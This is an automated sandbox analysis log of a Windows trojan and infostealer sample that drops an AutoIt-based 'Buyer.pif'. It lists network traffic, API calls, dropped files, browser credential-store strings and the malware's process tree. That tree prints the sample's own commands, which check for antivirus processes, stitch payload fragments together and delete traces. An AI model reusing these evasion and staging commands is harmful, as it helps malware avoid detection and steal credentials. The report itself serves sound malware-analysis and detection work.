                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.5:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.5:49705 version: TLS 1.2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FBF4F1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_00FBF4F1
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FBF286 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_00FBF286
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FD9C62 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_00FD9C62
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FB448D: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,11_2_00FB448D
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FA18E3 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00FA18E3
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FAEF37 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_00FAEF37
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\TrainsSexcamJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\GamingNatJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\PermitLiteJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\JennyArtisticJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\PolyphonicWeblogJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\SgLaidJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\FacingLoneJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\GeniusRepeatJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\EditedRightsJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\XiMiltonJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\MissWheatJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040497C0_2_0040497C
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406ED20_2_00406ED2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004074BB0_2_004074BB
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F481B011_2_00F481B0
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F6228211_2_00F62282
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F7A23E11_2_00F7A23E
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F5C4DD11_2_00F5C4DD
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F4E4CB11_2_00F4E4CB
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FCC5CB11_2_00FCC5CB
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F4869011_2_00F48690
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FB272F11_2_00FB272F
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F7E85211_2_00F7E852
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FA899111_2_00FA8991
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F48AF011_2_00F48AF0
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F76ABB11_2_00F76ABB
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F5CC3E11_2_00F5CC3E
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F6CDF011_2_00F6CDF0
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F4D08011_2_00F4D080
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FD503311_2_00FD5033
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F7712911_2_00F77129
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F616E411_2_00F616E4
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F61A5611_2_00F61A56
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F59BAD11_2_00F59BAD
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F67B6B11_2_00F67B6B
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F67D9A11_2_00F67D9A
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F61D0011_2_00F61D00
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F67FF711_2_00F67FF7
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F5DFFD11_2_00F5DFFD
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F61FC711_2_00F61FC7
                    Source: C:\Users\user\Desktop\file.exeCode function: String function: 004062A3 appears 57 times
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: String function: 00F60D80 appears 46 times
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: String function: 00F5FD18 appears 40 times
                    Source: file.exeStatic PE information: invalid certificate
                    Source: file.exe, 00000000.00000003.1998402768.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeP vs file.exe
                    Source: file.exe, 00000000.00000002.2002562030.00000000006FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs file.exe
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@26/54@3/3
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FB3F24 GetLastError,FormatMessageW,11_2_00FB3F24
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FA17A1 AdjustTokenPrivileges,CloseHandle,11_2_00FA17A1
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FA1DA5 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00FA1DA5
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FADAC1 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,11_2_00FADAC1
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FB3738 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,11_2_00FB3738
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199747278259[1].htmJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3872:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2180:120:WilError_03
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\nscA848.tmpJump to behavior
                    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: Buyer.pif, 0000000B.00000002.2541666136.000000000C8B8000.00000002.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541984442.000000000CCF8000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2561551186.000000006C60F000.00000002.00000001.01000000.00000008.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: Buyer.pif, 0000000B.00000002.2541666136.000000000C8B8000.00000002.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541984442.000000000CCF8000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2561551186.000000006C60F000.00000002.00000001.01000000.00000008.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: Buyer.pif, 0000000B.00000002.2541666136.000000000C8B8000.00000002.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541984442.000000000CCF8000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2561551186.000000006C60F000.00000002.00000001.01000000.00000008.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: Buyer.pif, 0000000B.00000002.2541666136.000000000C8B8000.00000002.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541984442.000000000CCF8000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2561551186.000000006C60F000.00000002.00000001.01000000.00000008.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                    Source: Buyer.pif, 0000000B.00000002.2541666136.000000000C8B8000.00000002.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541984442.000000000CCF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                    Source: Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                    Source: Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                    Source: Buyer.pif, 0000000B.00000002.2541666136.000000000C8B8000.00000002.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541984442.000000000CCF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                    Source: Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: Buyer.pif, 0000000B.00000002.2541666136.000000000C8B8000.00000002.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541984442.000000000CCF8000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2561551186.000000006C60F000.00000002.00000001.01000000.00000008.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: Buyer.pif, 0000000B.00000002.2541666136.000000000C8B8000.00000002.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541984442.000000000CCF8000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2561551186.000000006C60F000.00000002.00000001.01000000.00000008.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: Buyer.pif, 0000000B.00000002.2541666136.000000000C8B8000.00000002.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541984442.000000000CCF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                    Source: BKJKJE.11.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Buyer.pif, 0000000B.00000002.2541666136.000000000C8B8000.00000002.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541984442.000000000CCF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                    Source: Buyer.pif, 0000000B.00000002.2541666136.000000000C8B8000.00000002.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541984442.000000000CCF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                    Source: Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 447331
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "typesfaxincreasecompound" Ensemble
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Compile + Olive + Within + Psychiatry 447331\p
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Buyer.pif p
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 447331Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "typesfaxincreasecompound" Ensemble Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Compile + Olive + Within + Psychiatry 447331\pJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Buyer.pif pJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFHDHJKKJDH" & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
